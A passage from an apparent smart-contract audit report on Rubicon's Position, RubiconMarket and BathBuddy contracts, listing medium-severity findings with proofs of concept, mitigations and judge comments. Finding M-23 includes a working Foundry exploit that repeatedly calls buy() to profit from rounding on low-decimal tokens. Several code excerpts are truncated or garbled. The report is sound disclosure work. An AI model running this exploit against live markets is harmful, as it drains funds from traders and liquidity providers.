However, this defeats the purpose of Position contract, when the users are forced to manage their margin positions for the Position contract, as opposed to the contract doing so for them.

The most serious impact here, we believe, is not the difficult recover of funds, but in affecting/misleading user decisions when managing their margin portfolio. During a liquidation, an asset is repaid to seize another asset. If two assets that are seized belongs to two different positions, a “technically liquidated” position can be withdrawn, but leaving other positions at risk. In other words, the impossibility of closing a position will cause mismanagement, which is the opposite of what Position is trying to achieve.

Tools used

Manual review + Hardhat for POC/testing

This is a very difficult problem to address due to its nature as a business logic problem. At the very least, it is not possible to tell whether “a position was liquidated”, due to the way cross-margin positionings work.

We suggest exposing the following extra functionalities to address the immediate problem:

  • A “close position given margin” function, quite literally the opposite counterpart of “open position” function: The user is able to supply an amount of borrow to repay, an amount of collateral to withdraw, and an initial margin. The function calculates the loopings needed to repay/withdraw the required amount, and possibly performs them.

    • The point here is, the ability to close positions that have not been opened. If a position gets liquidated, there is no way for the Position contract to tell and manage its own portfolio accordingly.
  • A function to close a position without un-looping the position. This allows users to freely close positions that they recognize are no longer applicable.

HickupHH3 (judge) commented:

While similar, not a dup of #702 because their conditions are different. The fixes may have some overlap, though (but also potentially different since this issue leans toward management of partially liquidated positions).

[M-20] Position contract allows to interact with positions that are liquidated

Submitted by rvierdiiev.

Position contract allows to interact with positions that are liquidated. Because of that user can loose funds.

Proof of Concept

When new position is created, the amount of tokens that were supplied as collateral are saved as well. Later, when the user wants to close position, they will redeem that amount. If a user wants to add collateral to avoid liquidation or for any other reason, they can call increaseMargin, which will increase their bath token amount that is used as collateral for the position.

In this case, if Position bathToken collateral is liquidated, that means that their debt becomes 0 and if they call closePosition, then the call will revert, as it will need to redeem bathToken amount that the Position contract doesn’t control anymore.

So in this case, if the user will call increaseMargin, just after it was liquidated, then the provided collateral will never be possible to withdraw, as closePosition will always revert.


  1. User has open position for bathUSDC, with an amount of 1000 bathUSDC.
  2. Their position is under liquidation so they want to increaseMargin with 100 USDC more.
  3. Liquidation happens before increaseMargin was called, so the Position contract bathUSDC balance is now 0 and increaseMargin mints 100 bathUSDC more.
  4. increaseMargin increased the position’s bath amount to 1100.
  5. The user realized that they couldn’t save position and now want to get back collateral, they call closePosition.
  6. closePosition reverts when redeeming as a Position contract that doesn’t have 1100 bathUSDC, only 100 USDC.

As a result, the user’s 100 USDC is locked and can be used only as collateral for borrowing.

Tools Used


Do not allow users to interact with liquidated positions.

daoio (Rubicon) confirmed

[M-21] Position._borrowLimit doesn’t use exisiting collateral in case if user doesn’t have any _bathToken

Submitted by rvierdiiev.

Position._borrowLimit doesn’t use exisiting collateral in case if user doesn’t have any _bathToken.

Proof of Concept

Position._borrowLimit function is used to calculate how many times user needs to make borrow loop and how many percent of maximum allowed amount to borrow.

    function _borrowLimit(
        address _bathToken,
        address _asset,
        uint256 _assetAmount,
        uint256 _leverage
    ) internal returns (uint256 _limit, uint256 _lastBorrow) {
        (, uint256 _collateralFactor, ) =;
        // how much is needed to borrow in asset form
        uint256 _desiredAmount = wmul(_assetAmount, _leverage);

        // check if collateral was already supplied
        uint256 _minted = IERC20(_bathToken).balanceOf(address(this));
	// how much is borrowed on a current loop
        uint256 _loopBorrowed;

        while (_assetAmount <= _desiredAmount) {
            if (_limit == 0) {
		// if collateral already provided
                if (_minted != 0) {
                    uint256 _max = _maxBorrow(_bathToken);

		    // take into account previous collateral
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor).add(
                } else {
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor);
            } else {
                _loopBorrowed = wmul(_loopBorrowed, _collateralFactor);

            // here _assetAmount refers to the
            // TOTAL asset amount in the position
            _assetAmount += _loopBorrowed;

            if (_assetAmount > _desiredAmount) {
                // in case we've borrowed more than needed
                // return excess and calculate how much is
                // needed to borrow on the last loop
                // to not overflow _desiredAmount
                uint256 _borrowDelta = _desiredAmount.sub(
                _lastBorrow = _borrowDelta.mul(WAD).div(_loopBorrowed);

            } else if (_assetAmount == _desiredAmount) {
                // 1x short or perfect matching
            } else {
                // default case

Inside the while loop there is one interesting thing: if (_minted != 0). If this true, that means that the user currently has some amount of _bathToken, which means that they already have some collateral that can be used to borrow on it. The _maxBorrow(_bathToken) function is called in order to know how many collateral user has and what is the max amount they can borrow using that collateral.

But in this case, if this if (_minted != 0) is not true, it means that the user currently doesn’t have any _bathToken, then _maxBorrow(_bathToken) will not be called. However, the user still can have collateral other than _bathToken token. In this case, that collateral also should be used to borrow on it, but it’s ignored.

1.The user opened position using bathUSDC and they currently have some amount as collateral inside bathUSDC.
2.Then they open positions using bathETH and in this case their bathUSDC collateral is not used.

Tools Used


You should check if the user has liquidity (uint256 _err, uint256 _liq, uint256 _shortfall) = comptroller.getAccountLiquidity(address(this)); In this case if _liq is not 0, then you should call _maxBorrow(_bathToken) and use that collateral.

daoio (Rubicon) confirmed

[M-22] Potential infinite loop in _borrowLimit function

Submitted by bytes032, also found by 0xPkhatri, Udsen, thekmj, anodaram and volodya.

The infinite loop vulnerability could cause the openPosition functionality to become unresponsive or fail, negatively affecting the performance and usability of the whole system.

Proof of Concept

The _borrowLimit function is an internal view function used by openPosition that calculates the maximum number of borrowing loops allowed for a given asset and leverage, taking into account the collateral factor and any previously supplied collateral. It returns the calculated borrowing limit and the amount required to borrow in the last loop to avoid exceeding the desired amount.

The function works as follows:

  1. Retrieve the collateral factor for the given _bathToken from the comptroller contract.
  2. Calculate the desired amount of the asset to borrow based on the given _assetAmount and _leverage.
  3. Determine if collateral was already supplied by checking the balance of the _bathToken in the contract.
  4. Initialize a while loop that continues until the _assetAmount is less than or equal to the desired amount.
  5. In each loop iteration:

    1. Calculate the amount that can be borrowed in the current loop _loopBorrowed based on the collateral factor and any previously supplied collateral.
    2. Update the total asset amount in the position by adding the borrowed amount from the current loop.
    3. Check if the updated asset amount has reached or exceeded the desired amount:

      • If it has, calculate the borrowing amount required in the last loop to not exceed the desired amount and increment the borrowing limit.
      • If the asset amount perfectly matches the desired amount, increment the borrowing limit.
      • In other cases, increment the borrowing limit and proceed to the next iteration.

The calculations for the desiredAmount and the _loopBorrowed are performed by using the wmul function.

wmul is designed to multiply two fixed-point numbers (with 18 decimals precision) and return the result as another fixed-point number. Here’s a breakdown of how the function works:

  1. mul(uint256 x, uint256 y) is a helper function that multiplies two uint256 values x and y. It checks for overflow by ensuring that either y is 0 or that the division of the result z by y is equal to x. If the condition is not met, it reverts with an error message.
  2. add(uint256 x, uint256 y) is another helper function that adds two uint256 values x and y. It checks for overflow by ensuring that the result z is greater than or equal to x. If the condition is not met, the transaction will revert.
  3. wmul(uint256 x, uint256 y) is the primary function that multiplies two fixed-point numbers. The function does the following:

    • Calls the mul function to multiply x and y.
    • Adds half of the fixed-point base (WAD/2) to the result using the add function. This step is crucial for rounding the result correctly.
    • Finally, it divides the sum by the fixed-point base (WAD) to obtain the final fixed-point result z.

Now that we know how most of the calculation works let’s assume we call _borrowLimit with the variables used in this test suite:

function _borrowLimit(_bathToken,_asset, 25e18, 23.32e18)

Additionally, the collateral factor stays unchanged:

    // collateralFactor = 70% for cTokenStable
    await comptroller._setCollateralFactor(
      parseUnits("0.7", 18)
    // collateralFactor = 70% for cToken
    await comptroller._setCollateralFactor(
      parseUnits("0.7", 18)

Calculating the desired amount, we get that its 58.3e18, which is the result of wmul(25e18, 23.32e18).

Now, let’s examine what happens within the while loop:

            if (_limit == 0) {
		// if collateral already provided
                if (_minted != 0) {
                    uint256 _max = _maxBorrow(_bathToken);

		    // take into account previous collateral
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor).add(

                } else {
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor);
            } else {
                _loopBorrowed = wmul(_loopBorrowed, _collateralFactor);

The important thing to note here is that on the first iteration _loopBorrowed is the result of wmul(_assetAmount, _collateralFactor, but going forward it is a result of itself, e.g. wmul(_loopBorrowed, _collateralFactor).

  • On the first iteration: (limit == 0)

    • _loopBorrowed = wmul(25e18, 0.7e18) = 17.5e18
    • _assetAmount = 25e18 + 17.5e18 = 42.5e18
  • On the second iteration: (limit != 0)

    • _loopBorrowed = wmul(17.5e18, 0.7e18) = 12.25e18
    • _assetAmount = 42.5e18 + 12.25e18 = 54.75e18
  • On the third iteration: (limit != 0)

    • _loopBorrowed = wmul(12.25e18, 0.7e18) = 8.575e18
    • _assetAmount = 54.75e18 + 8.575e18 = 63.325e18

So, it takes 3 iterations to reach the required result. However, the vulnerability here though is hiding in plain sight.

Given that _loopBorrowed is “dividing from itself”, what would happen if it goes to 1, or even 0, but the desired amount is big enough?

But… how could that happen? What if the collateralFactor is 0.5e18 instead of 0.7e18?

    // collateralFactor = 70% for cTokenStable
    await comptroller._setCollateralFactor(
      parseUnits("0.7", 18)
    // collateralFactor = 70% for cToken
    await comptroller._setCollateralFactor(
      parseUnits("0.5", 18)

Let’s do the exercise again with a reduced collateral factor:

  • On the first iteration: (limit == 0)

    • _loopBorrowed = wmul(25e18, 0.5e18) = 12.5e18
    • _assetAmount = 25e18 + 12.5e18 = 37.5e18
  • On the second iteration: (limit != 0)

    • _loopBorrowed = wmul(12.5e18, 0.5e18) = 6.25e18
    • _assetAmount = 37.5e18 + 6.25e18 = 43.75e18
  • On the third iteration: (limit != 0)

    • _loopBorrowed = wmul(6.25e18, 0.5e18) = 3.125e18
    • _assetAmount = 43.75e18 + 3.125e18 = 46,875e18
  • On the fourth iteration: (limit != 0)

    • _loopBorrowed = wmul(3.125e18, 0.5e18) = 1.5625e18
    • _assetAmount = 43.75e18 + 1.5625e18 = 48.4375e18
  • On the fifth iteration: (limit != 0)

    • _loopBorrowed = wmul(1.5625e18, 0.5e18) = 0.78125e18
    • _assetAmount = 43.75e18 + 6.2e18 = 49,2187e18

Now that _loopBorrowed < 0 I think its pretty clear where this is going. It will take approximately 60 more iterations until wmul(_loopBorrowed, 0.5e18) returns 1.

At this point _assetAmount will be around 50000000000000000020, which means it will take the 8299999999999999980 more iterations to get to the required desired amount.

You can verify these results by running the yarn hardhat test ./test/leverage-wrapper.ts --grep "should open long position" command from the existing test suite, which will produce the following output:

I have added some console logs for you if you want a visual representation:

  function _borrowLimit(
        address _bathToken,
        address _asset,
        uint256 _assetAmount,
        uint256 _leverage
    ) internal view returns (uint256 _limit, uint256 _lastBorrow) {
        (, uint256 _collateralFactor, ) =;
        // how much is needed to borrow in asset form
        uint256 _desiredAmount = wmul(_assetAmount, _leverage);
        console.log(_desiredAmount, "desiredAmount");

        // check if collateral was already supplied
        uint256 _minted = IERC20(_bathToken).balanceOf(address(this));
        // how much is borrowed on a current loop
        uint256 _loopBorrowed;
        while (_assetAmount <= _desiredAmount) {
            console.log("****** in loop");
            if (_limit == 0) {
		// if collateral already provided
                if (_minted != 0) {
                    uint256 _max = _maxBorrow(_bathToken);

                    console.log("max", _max);

		    // take into account previous collateral
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor).add(

                } else {
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor);
            } else {
                _loopBorrowed = wmul(_loopBorrowed, _collateralFactor);

            console.log("_loopBorrowed", _loopBorrowed);

            // here _assetAmount refers to the
            // TOTAL asset amount in the position
            _assetAmount += _loopBorrowed;
            console.log("_assetAmount", _assetAmount);

            if (_assetAmount > _desiredAmount) {
                // in case we've borrowed more than needed
                // return excess and calculate how much is
                // needed to borrow on the last loop
                // to not overflow _desiredAmount
                uint256 _borrowDelta = _desiredAmount.sub(
                _lastBorrow = _borrowDelta.mul(WAD).div(_loopBorrowed);

            } else if (_assetAmount == _desiredAmount) {
                // 1x short or perfect matching
            } else {
                // default case

            console.log("limit", _limit);

In conclusion, when the collateral factor is lower (and the leverage high), the _borrowLimit function becomes highly inefficient and requires a large number of iterations to calculate the desired amount.

This is just one nuance of this vulnerability and it could be triggered in various ways, but I hope this single explanation is good enough to convince you that it should be addressed.

That’s probably one of my hardest mitigations steps to write, so I’ll brain-dump almost everything I’ve researched and that comes to my mind.

Limit the number of iterations:

Introduce a maximum number of iterations that the while loop can run, preventing the function from running indefinitely.

This approach helps prevent the infinite loop issue, but it means your system won’t be able to work with specific collateral factors.

Instead, the maximum number of iterations can be chosen based on expected usage patterns and system requirements.

uint256 maxIterations = 50;
uint256 currentIteration = 0;

while (_assetAmount <= _desiredAmount && currentIteration < maxIterations) {
    // existing logic

Restrict the minimum _loopBorrowed value:

Define a minimum acceptable value for _loopBorrowed and halt the loop if the value goes below this threshold.

This approach can help prevent the _loopBorrowed value from becoming too small and causing an infinite loop. However, it has the same drawbacks as the previous solution.

uint256 minLoopBorrowed = 1e9; // Choose an appropriate minimum value based on the token decimals

while (_assetAmount <= _desiredAmount) {
    // existing logic

    if (_loopBorrowed < minLoopBorrowed) {

Use a more sophisticated algorithm:

Instead of a while loop, consider using a more sophisticated algorithm to calculate the borrowing limit and last borrow amount.

It might be possible to derive a closed-form solution that directly calculates the borrowing limit without needing a loop.

However, this approach requires a deep understanding of the mathematical relationship between the input parameters and the desired borrowing limit.

For instance, if the borrowing limit calculation follows a simple linear relationship, the closed-form solution could be derived as follows:

function borrowLimit(uint256 _desiredAmount, uint256 _collateral, uint256 _loanFactor) public view returns (uint256) {
    // Calculate the borrowing limit using the closed-form solution
    uint256 borrowLimit = (_desiredAmount * _loanFactor) / (_collateral - _desiredAmount);

    return borrowLimit;

To apply the closed-form solution to the _borrowLimit function, we would need to adjust the smart contract to directly compute the required number of iterations n and the final borrowed amount.

Instead, we can use the closed-form solution formula to calculate n and then determine the final borrowed amount using the formula for the sum of a geometric series.

For example, consider the scenario where the initial asset amount is A0 = 10,000 tokens, the desired asset amount is Ad = 15,000 tokens (10,000 tokens + 5,000 tokens), and the collateral factor is c = 0.5.

Using the closed-form solution formula: n = log_c((1 - ((Ad * (1 - c)) / A0)) - 1).

Substituting the values: n = log_0.5((1 - ((15,000 * (1 - 0.5)) / 10,000)) - 1).

After calculating, we get: n ≈ 1.58.

Since n should be an integer (as it represents the number of iterations), we round up to the nearest whole number: n = 2.

We can now calculate the final borrowed amount using the formula for the sum of a geometric series: Ad = A0 + A0 * c + A0 * c^2 + ... + A0 * c^n.

Substituting the values: 15,000 = 10,000 + 10,000 * 0.5 + 10,000 * 0.5^2.

Calculating the geometric series: 15,000 = 10,000 + 5,000 + 2,500.

Thus, the final borrowed amount is: 5,000 = 5,000 + 2,500.

Now that we know how it could work, we would need to identify the geometric series that represents the problem and use the closed-form formula for a geometric series to calculate the borrow limit.

If the collateral factor is not equal to 1, we would need to calculate the number of terms using the closed-form formula for a geometric series and the last borrow amount using the geometric series formula.

The pseudocode for the updated _borrowLimit function using the closed-form solution looks like this:

function _borrowLimit(
    address _bathToken,
    address _asset,
    uint256 _assetAmount,
    uint256 _leverage
) internal view returns (uint256 _limit, uint256 _lastBorrow) {
    (, uint256 _collateralFactor, ) =;
    uint256 _desiredAmount = wmul(_assetAmount, _leverage);

    uint256 _minted = IERC20(_bathToken).balanceOf(address(this));

    if (_minted != 0) {
        uint256 _max = _maxBorrow(_bathToken);
        _assetAmount = wmul(_assetAmount, _collateralFactor).add(_max);

    if (_collateralFactor == WAD) {
        // Collateral factor is 1, which means it's a 1x short or perfect matching
        _limit = (_desiredAmount.sub(_assetAmount)).div(WAD);
        _lastBorrow = wmul(_assetAmount, _collateralFactor);
    } else {
        // Calculate the number of terms using the closed-form formula for a geometric series
        _limit = uint256(

        // Calculate the last borrow amount
        _lastBorrow = wmul(_assetAmount, pow(_collateralFactor, _limit)).sub(_assetAmount);

Please note that the provided solution is incomplete and requires additional adjustments.

daoio (Rubicon) acknowledged and commented:

Yeah, it’s correct, it will loop infinitely if collateralFactor < ~66%, that’s known. The report relies on bathToken's risk params, which is out-of-scope, though the report itself is just incredibly HQ.

[M-23] Attack on rounding errors to get risk free profit

Submitted by KingNFT, also found by joestakey, cducrest, Neon2835, 0xWaitress, koxuan and J4de.

When users buy() from RubiconMarket, their spend is rounded down. Tokens with small decimals, such as WBTC and GUSD, are vulnerable to rounding error attack. Attackers can exploit it to get risk free profit.

Proof of Concept

The issue arises on L319 of buy(), we can see calculation of spend is rounded down:

File: contracts\RubiconMarket.sol
314:     function buy(
315:         uint256 id,
316:         uint256 quantity
317:     ) public virtual can_buy(id) synchronized returns (bool) {
318:         OfferInfo memory _offer = offers[id];
319:         uint256 spend = mul(quantity, _offer.buy_amt) / _offer.pay_amt; // @audit should round up
447:         return true;
448:     }

The following test cases show how attackers can exploit it to get profit:

pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "../../contracts/periphery/TokenWithFaucet.sol";
import "../../contracts/RubiconMarket.sol";
import "forge-std/Test.sol";

contract MockERC20 is ERC20 {
    uint8 private decimals_;

        string memory _name,
        string memory _symbol,
        uint8 _decimals
    ) ERC20(_name, _symbol) {
        decimals_ = _decimals;

    function decimals() public view override returns (uint8) {
        return decimals_;

    function mint(address account, uint256 amount) external {
        _mint(account, amount * 10 ** decimals_);

/// @notice proxy isn't used here
contract AttackOnRoundingError is Test {
  address public owner;
  address FEE_TO = 0x0000000000000000000000000000000000000FEE;
  address attacker = address(0x01020304);
  uint256 WBTCOfferId;
  uint256 GUSDOfferId;
  // core contracts
  RubiconMarket market;
  // test tokens
  MockERC20 USDC;
  MockERC20 WBTC;
  MockERC20 GUSD;

  function setUp() public {
    owner = msg.sender;

    // deploy new Market instance and init
    market = new RubiconMarket();

    // deploy test tokens
    USDC = new MockERC20("Test Stablecoin", "USDC", 6);
    WBTC = new MockERC20("Wrapped BTC", "WBTC", 8);
    // the top 77th token: 
    GUSD = new MockERC20("Gemini USD", "GUSD", 2);, 1_000_000);
    USDC.approve(address(market), type(uint256).max);
    // place ask and bid for WBTC/USDC pair at price 30,000 USDC/WBTC
    WBTCOfferId = market.offer(300000e6, USDC, 10e8, WBTC, address(this), owner);

    // place ask and bid for GUSD/USC pair at price 1 USDC/GUSD
    GUSDOfferId = market.offer(300000e6, USDC, 300000e2, GUSD, address(this), owner);, 10);
    WBTC.approve(address(market), type(uint256).max);, 100000);
    GUSD.approve(address(market), type(uint256).max);

  function test_AttackOnWBTCPair() public {
    uint256 l2GasCost;
    uint256 USDCReceived;
    uint256 WBTCSent;
    { // stack too deep
      uint256 USDCBalanceBefore = USDC.balanceOf(attacker);
      uint256 WBTCBalanceBefore = WBTC.balanceOf(attacker);

      uint256 gasBefore = gasleft();
      for (uint256 i; i < 300; ++i) { // sum of gas can't excess block gas limit of 15M
, 599);
      uint256 gasAfter = gasleft();
      l2GasCost = gasBefore - gasAfter;
      uint256 USDCBalanceAfter = USDC.balanceOf(attacker);
      USDCReceived = USDCBalanceAfter - USDCBalanceBefore;
      uint256 WBTCBalanceAfter = WBTC.balanceOf(attacker);
      WBTCSent = WBTCBalanceBefore - WBTCBalanceAfter;

    // reference
    uint256 l1GasCost = 4013;
    uint256 l1GasPrice = 4e9;
    uint256 l2GasPrice = 0.001e9;
    uint256 ETHPrice = 2000e6;
    uint256 l1GasCostInUSDC = l1GasCost * l1GasPrice * ETHPrice / 1e18;
    uint256 l2GasCostInUSDC = l2GasCost * l2GasPrice * ETHPrice / 1e18;
    uint256 WBTCCostInUSDC = WBTCSent * 30000e6 / 1e8;
    uint256 totalCostInUSDC = l1GasCostInUSDC + l2GasCostInUSDC + WBTCCostInUSDC;
    uint256 profitInUSDC = USDCReceived - totalCostInUSDC;
    uint256 profitInPercentage = 100 * profitInUSDC / totalCostInUSDC;

    console.log("==========Attack on WBTC pair==========");
    console.log("Given price: 2000 USDC/ETH, 30,000 USDC/BTC");
    console.log("Given L1(Ethereum) gas price: 4 Gwei");
    console.log("Given L2(Optimism) gas price: 0.001 Gwei");
    console.log("Given decimals: WBTC(8), USDC(6)");
    console.log("L1 gas cost:", l1GasCost);
    console.log("L1 gas cost in USDC:", l1GasCostInUSDC);
    console.log("L2 gas cost:", l2GasCost);
    console.log("L2 gas cost in USDC:", l2GasCostInUSDC);
    console.log("WBTC cost:", WBTCSent);
    console.log("WBTC cost in USDC:", WBTCCostInUSDC);
    console.log("Total cost in USDC:", totalCostInUSDC);
    console.log("USDC received:", USDCReceived);
    console.log("Profit in USDC:", profitInUSDC);
    console.log("Profit in percentage:", profitInPercentage, "%");

  function test_AttackOnGUSDPair() public {
    uint256 l2GasCost;
    uint256 USDCReceived;
    uint256 GUSDSent;
    { // stack too deep
      uint256 USDCBalanceBefore = USDC.balanceOf(attacker);
      uint256 GUSDBalanceBefore = GUSD.balanceOf(attacker);

      uint256 gasBefore = gasleft();
      for (uint256 i; i < 300; ++i) { // sum of gas can't excess block gas limit of 15M
, 19_999);
      uint256 gasAfter = gasleft();
      l2GasCost = gasBefore - gasAfter;
      uint256 USDCBalanceAfter = USDC.balanceOf(attacker);
      USDCReceived = USDCBalanceAfter - USDCBalanceBefore;
      uint256 GUSDBalanceAfter = GUSD.balanceOf(attacker);
      GUSDSent = GUSDBalanceBefore - GUSDBalanceAfter;

    // reference
    uint256 l1GasCost = 4013;
    uint256 l1GasPrice = 20e9;
    uint256 l2GasPrice = 0.001e9;
    uint256 ETHPrice = 2000e6;
    uint256 l1GasCostInUSDC = l1GasCost * l1GasPrice * ETHPrice / 1e18;
    uint256 l2GasCostInUSDC = l2GasCost * l2GasPrice * ETHPrice / 1e18;
    uint256 GUSDCostInUSDC = GUSDSent * 1e6 / 1e2;
    uint256 totalCostInUSDC = l1GasCostInUSDC + l2GasCostInUSDC + GUSDCostInUSDC;
    uint256 profitInUSDC = USDCReceived - totalCostInUSDC;
    uint256 profitInPercentage = 100 * profitInUSDC / totalCostInUSDC;

    console.log("==========Attack on GUSD pair==========");
    console.log("Given price: 2000 USDC/ETH, 30,000 USDC/BTC");
    console.log("Given L1(Ethereum) gas price: 20 Gwei");
    console.log("Given L2(Optimism) gas price: 0.001 Gwei");
    console.log("Given decimals: GUSD(2), USDC(6)");
    console.log("L1 gas cost:", l1GasCost);
    console.log("L1 gas cost in USDC:", l1GasCostInUSDC);
    console.log("L2 gas cost:", l2GasCost);
    console.log("L2 gas cost in USDC:", l2GasCostInUSDC);
    console.log("GUSD cost:", GUSDSent);
    console.log("GUSD cost in USDC:", GUSDCostInUSDC);
    console.log("Total cost in USDC:", totalCostInUSDC);
    console.log("USDC received:", USDCReceived);
    console.log("Profit in USDC:", profitInUSDC);
    console.log("Profit in percentage:", profitInPercentage, "%");


Case 1: WBTC/USDC pair

The given market parameters and test result for Case 1:

[PASS] test_AttackOnWBTCPair() (gas: 11427870)
  ==========Attack on WBTC pair==========
  Given price: 2000 USDC/ETH, 30,000 USDC/BTC
  Given L1(Ethereum) gas price: 4 Gwei
  Given L2(Optimism) gas price: 0.001 Gwei
  Given decimals: WBTC(8), USDC(6)
  L1 gas cost: 4013
  L1 gas cost in USDC: 32104
  L2 gas cost: 14251627
  L2 gas cost in USDC: 28503
  WBTC cost: 300
  WBTC cost in USDC: 90000
  Total cost in USDC: 150607
  USDC received: 179700
  Profit in USDC: 29093
  Profit in percentage: 19 %

From the log, we can see a 19% profit in one attack. The absolute profit value is about 0.029 USDC, though it is small, but Optimism confirms transactions instantly, attackers can submit huge number of transactions such as 1M to get 29,000 USDC profit.

One point needs to be pointed out, market parameters other than L1 gas prices are consistent with the actual normal situations. The 4 Gwei L1 gas price is a a relatively low price, and it’s a key condition to make the attack be profitable. But this scenario can actually happen, here are some instances when a gas price drops below 4 Gwei.

2022/8/21 18:00 | 1.56939
2022/9/19 18:00 | 2.3536
2022/9/17 12:00 | 2.63193
2022/7/31 12:00 | 2.87714
2022/8/21 12:00 | 2.99122
2022/7/31 6:00 | 3.03533
2022/10/5 18:00 | 3.14388
2022/9/4 18:00 | 3.15065
2022/10/2 18:00 | 3.18227
2022/9/4 6:00 | 3.19788
2022/7/31 18:00 | 3.20089
2022/8/1 12:00 | 3.22637
2022/9/4 12:00 | 3.34139
2022/8/20 18:00 | 3.57428
2022/9/18 12:00 | 3.57598
2022/9/22 18:00 | 3.60006
2022/8/14 18:00 | 3.63901
2022/9/18 6:00 | 3.72209
2022/9/12 12:00 | 3.74844
2022/8/29 0:00 | 3.8843
2022/8/21 6:00 | 3.94099
2022/9/25 12:00 | 3.97128
2022/9/21 18:00 | 3.98098
2022/8/6 18:00 | 3.98923

Case 2: GUSD/USDC pair

The given market parameters and test result for Case 2:

[PASS] test_AttackOnGUSDPair() (gas: 11427889)
  ==========Attack on GUSD pair==========
  Given price: 2000 USDC/ETH, 30,000 USDC/BTC
  Given L1(Ethereum) gas price: 20 Gwei
  Given L2(Optimism) gas price: 0.001 Gwei
  Given decimals: GUSD(2), USDC(6)
  L1 gas cost: 4013
  L1 gas cost in USDC: 160520
  L2 gas cost: 14251627
  L2 gas cost in USDC: 28503
  GUSD cost: 300
  GUSD cost in USDC: 3000000
  Total cost in USDC: 3189023
  USDC received: 5999400
  Profit in USDC: 2810377
  Profit in percentage: 88 %

For the GUSD pair, we can see even on a normal 20 Gwei L1 gas price condition, the attack profit rate is 88%. The absolute profit value in one attack is about 2.8 USDC. Similarly, attackers can submit huge number of transactions to make a significant profit.

Calculation of spend should be rounded up.

daoio (Rubicon) acknowledged and commented via duplicate issue #1142:

It’s interesting, but the amounts used are too small to be real. Moreover, such offers can’t be created because they will probably exceed minimum sell amount.

HickupHH3 (judge) commented via duplicate issue #1142:

I agree that the stated amounts in the example are unlikely to be used practically, but they aren’t small enough to the point where I can say it’s negligible. Ie. larger than negligible, but smaller than for practical usage.

Will let this issue stand as Medium severity.

HickupHH3 (judge) commented:

Well written! Choosing this for the report because it factors in gas conditions.

[M-24] Zero reward rate calculation impedes low-decimals token distributions

Submitted by 0xNineDec, also found by adriro, Ruhum, joestakey, Ignite, bytes032, Ace-30, Ace-30, KingNFT, AlexCzm, SaeedAlipoor01988, ktg, rvierdiiev, cccz, SpicyMeatball and J4de.

Several (token, distribution period) couples are not feasible in BathBuddy, forcing the owner to set shorter distributions or providing more amount of tokens to be distributed.

In BathBuddy, the reward rate of a distribution is calculated following a linear distribution according to the amount of rewards to be distributed across the period:

function notifyRewardAmount(
    uint256 reward,
    IERC20 rewardsToken
) external onlyOwner updateReward(address(0), address(rewardsToken)) {
    if (block.timestamp >= periodFinish[address(rewardsToken)]) {
        rewardRates[address(rewardsToken)] = reward.div(
    } else {
        uint256 remaining = periodFinish[address(rewardsToken)].sub(
        uint256 leftover = remaining.mul(
        rewardRates[address(rewardsToken)] = reward.add(leftover).div(

The rate for each reward token spreads the reward amount across the rewardsDuration:

rewardRates[address(rewardsToken)] = reward.div(

Because the SafeMath implementation asks for compiler versions over 0.8.0 to execute the legacy division a/b, the reward rate could be zero for some distribution configurations, forcing the owner to reduce the duration or increase the reward amount. Bear in mind, that the implementation of the BathBuddy allows using arbitrary tokens for rewards.

Proof of Concept

  1. The owner launches a distribution of WBTC and is forced to set a pair of reward and rewardsDuration[address(rewardsToken)] such that their integer division yields at least in 1.
  2. Considering that the rate is 1, the year has (365 * 24 * 60 * 60 = 31.53e6) seconds which yields in 0.31536 WBTC ($8,500 @ 27,000 USD/BTC) at minimum of rewards per user.

The following test refactors the bath-buddy.ts deploy fixture with the following:

--- a/test/hardhat-tests/bath-buddy.ts
+++ b/test/hardhat-tests/bath-buddy.ts
@@ -44,9 +44,9 @@ describe("RubiconV2 rewards system", function () {
     const testStableCoin = await testCoinFactory.deploy(
-      "Test Stablecoin",
-      "TUSDC",
-      6
+      "Test WBTC",
+      "WBTC",
+      8

-    await testStableCoin.transfer(buddy.address, parseUnits("10000", 6));
+    await testStableCoin.transfer(buddy.address, parseUnits("0.315", 8));
     await buddy.notifyRewardAmount(
-      parseUnits("10000", 6),
+      parseUnits("0.315", 8),
+      testStableCoin.address
+    );

And the test is the same as the one provided (should get rewards from both Comptroller and BathBuddy) only calculating the amount of rewards received by getting the balance before and after claiming them:

    it("gets abusive amount of rewards per year", async function () {
      const {
      } = await loadFixture(buddySetupFixtureAudit);

      expect(await comptroller.getCompAddress())
      const b0 = await testStableCoin.balanceOf(owner.address);

      await testCoin.approve(bathTEST.address, parseUnits("1000"));

      const earned = await buddy.earned(owner.address, testStableCoin.address);

      const earnedComp = await testRewardCoin.balanceOf(owner.address);

      // skip a year
      await time.increaseTo((await time.latest()) + 365 * 24 * 60 * 60);

      bathHouse.claimRewards([buddy.address], [testStableCoin.address]);

      const earned2 = await testStableCoin.balanceOf(owner.address);
      console.log(`Rewards earned per year: ${earned2.sub(b0)}`)
      const earnedComp2 = await testRewardCoin.balanceOf(owner.address);


It can be seen that setting the distribution amount to 0.315e8 (slightly below the amount of seconds per year) yields in zero rewards:

Rewards earned per year: 0

And setting the distribution amount slightly over the seconds per year (0.3154e8) successfully yields in rewards:

Rewards earned per year: 31536000

Increase the precision scale of the reward rate calculation using a factor (e.g. 10**8) multiplied to to the amount when calculating the distribution’s rate.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

Tough call in deciding between this and #1293 for best report, but going with this.

[M-25] RubiconMarket: buy() may not take any fee for tokens with low decimal precision

Submitted by PierrickGT, also found by Evo, caventa, 0xNineDec and carlitox477.

In the buy function of the RubiconMarket contract, a fee is subtracted on taker trades. The default feeBPS is set to 1 which is equivalent to a fee of 0.01% or 0.0001 in decimal form.

For tokens like gUSD with a low decimal precision of 2, no fees will be taken on 3 figure trades since Solidity will round down the result to 0.

Proof of Concept

The taker fee is calculated in the buy function of the RubiconMarket contract on L338 and also in the calcAmountAfterFee function on L583.

The following reasoning also apply to the maker fee on L346 and L586.

Let’s take, for example, a 500 gUSD trade. Mathematically the fee would be: 500 * 0.0001 = 0.05.

In solidity, for a token with 2 decimal places, we would get: amount * feeBPS / 100_000 = 50000 * 1 / 100_000 = 0 cause it rounds down to 0.

It would allow a user to not pay any taker and/or maker fee on 3 figure trades.

Tools Used

Foundry unit test available here

